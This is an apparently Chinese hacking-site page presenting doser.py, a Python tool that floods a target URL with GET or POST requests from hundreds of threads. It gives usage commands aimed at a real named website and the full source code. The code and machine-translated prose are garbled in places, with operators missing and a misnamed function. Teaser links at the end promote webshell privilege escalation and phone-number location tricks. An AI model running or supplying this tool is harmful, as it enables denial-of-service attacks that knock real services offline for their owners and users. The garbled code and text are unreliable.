Denial of Service (DoS)是分布式系统拒绝服务攻击攻击器;
doser.py是一款用Python撰写的于HTTP或HTTPS恳求的DoS专用工具;主要是对于有“application-denial-of-service (程序运行拒绝服务攻击(Dos))"系统漏洞的网址;
使用 ***
doser.py [-h] [-g G] [-p P] [-d D] [-ah AH] [-t T]
可选主要参数:
-h,--help 显示信息此协助信息内容并撤出
-g 特定GET恳求。 使用 *** :-g'<url>'
-p 特定POST恳求。 使用 *** :-p'<url>'
-d 为POST恳求特定数据信息重力梯度
-ah 特定addtional题目
-t 特定要应用的线程数
1、999个进程推送GET恳求:
python doser.py -t 999 -g 'https://www.fujieace.com'
2、999个进程应用json数据信息推送POST恳求:
python doser.py -t 999 -p 'https://www.fujieace.com' -ah 'Content-Type: application/json' -d '{"json": "payload"}'
1、github网站地址:https://github.com/Quitten/doser.py
2、doser.py编码:
import requests
import sys
import threading
import random
import re
import argparse
host=''
headers_useragents=[]
request_counter=0
printedMsgs = []
def printMsg(msg):
if msg not in printedMsgs:
print ("\n" msg " after %i requests" % request_counter)
printedMsgs.append(msg)
def useragent_list():
global headers_useragents
headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
return(headers_useragents)
def randomString(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 90)
out_str = chr(a)
return(out_str)
def initHeaders():
useragent_list()
global headers_useragents, additionalHeaders
headers = {
'User-Agent': random.choice(headers_useragents),
'Cache-Control': 'no-cache',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Referer': 'http://www.google.com/
?q=' randomString(random.randint(5,10)),
'Keep-Alive': str(random.randint(110,120)),
'Connection': 'keep-alive'
}
if additionalHeaders:
for header in additionalHeaders:
headers.update({header.split(":")[0]:header.split(":")[1]})
return headers
def handleStatusCodes(status_code):
global request_counter
sys.stdout.write("\r%i requests has been sent" % request_counter)
sys.stdout.flush()
if status_code == 429:
printMsg("You have been throttled")
if status_code == 500:
printedMsg("Status code 500 received")
def sendGET(url):
global request_counter
headers = initHeaders()
try:
request_counter =1
request = requests.get(url, headers=headers)
# print 'her'
handleStatusCodes(request.status_code)
except:
pass
def sendPOST(url, payload):
global request_counter
headers = initHeaders()
try:
request_counter =1
if payload:
request = requests.post(url, data=payload, headers=headers)
else:
request = requests.post(url, headers=headers)
handleStatusCodes(request.status_code)
except:
pass
class SendGETThread(threading.Thread):
def run(self):
try:
while True:
global url
sendGET(url)
except:
pass
class SendPOSTThread(threading.Thread):
def run(self):
try:
while True:
global url, payload
sendPOST(url, payload)
except:
pass
# TODO:
# check if the site stop responding and alert
def main(argv):
parser = argparse.ArgumentParser(description='Sending unlimited amount of requests in order to perform DoS attacks. Written by Barak Tawily')
parser.add_argument('-g', help='Specify GET request. Usage: -g \'<url>\'')
parser.add_argument('-p', help='Specify POST request. Usage: -p \'<url>\'')
parser.add_argument('-d', help='Specify data payload for POST request', default=None)
parser.add_argument('-ah', help='Specify addtional header/s. Usage: -ah \'Content-type: application/json\' \'User-Agent: Doser\'', default=None, nargs='*')
parser.add_argument('-t', help='Specify number of threads to be used', default=500, type=int)
args = parser.parse_args()
global url, payload, additionalHeaders
additionalHeaders = args.ah
payload = args.d
if args.g:
url = args.g
for i in range(args.t):
t = SendGETThread()
t.start()
if args.p:
url = args.p
for i in range(args.t):
t = SendPOSTThread()
t.start()
if len(sys.argv)==1:
parser.print_help()
exit()
if __name__ == "__main__":
main(sys.argv[1:])
什么叫Tamper Data? Tamper Data是Mozilla Firefox拓展,能够在推送HTTP恳求以前改动和查询HTTP恳求。它将显示信息Web电脑浏览器意味着您推送的数据信息,比如...
在一些好莱坞电影中,我们经常看到超级黑客在电脑前“侵入”别人的安全系统。你能熟练、轻松地输入很多复杂的代码,而且不会一下子全部入侵/破解,这是不是令人羡慕?事实上,我们也可以像电影和游戏中的黑客一样攻...
Nmap是一款网络扫描和服务器检验的十分有效的专用工具。 Nmap不是限于只是搜集信息内容和枚举类型,另外能够用于做为一个系统漏洞探测仪或安全性扫描枪。它能够适用winodws,linux,mac等...
详解webshell提权服务器的21种方法 1.radmin连接法 条件是你权限够大,对方连防火墙也没有。封装个radmin上去,运行,开对方端口,然后radmin上去...
侧门和木马病毒有什么不同? 我觉得严苛实际意义沒有差别的,微小的区别是有的。有一个微小区别先讲一下,这两个词出去早中晚不一样。老一代网络黑客,不屑黑本人设备(那时候本人机网速太慢),觉得网络服务器才...
黑客便是假借黑客名义操控别人电脑的黑客技能,咱们都知道手机有定位功能,但咱们并不知道如何定位手机号码,那么今日黑客教你定位手机号码以及手机号码定位软件下载。 只是经过一个手机号,就能够精确认位出你的...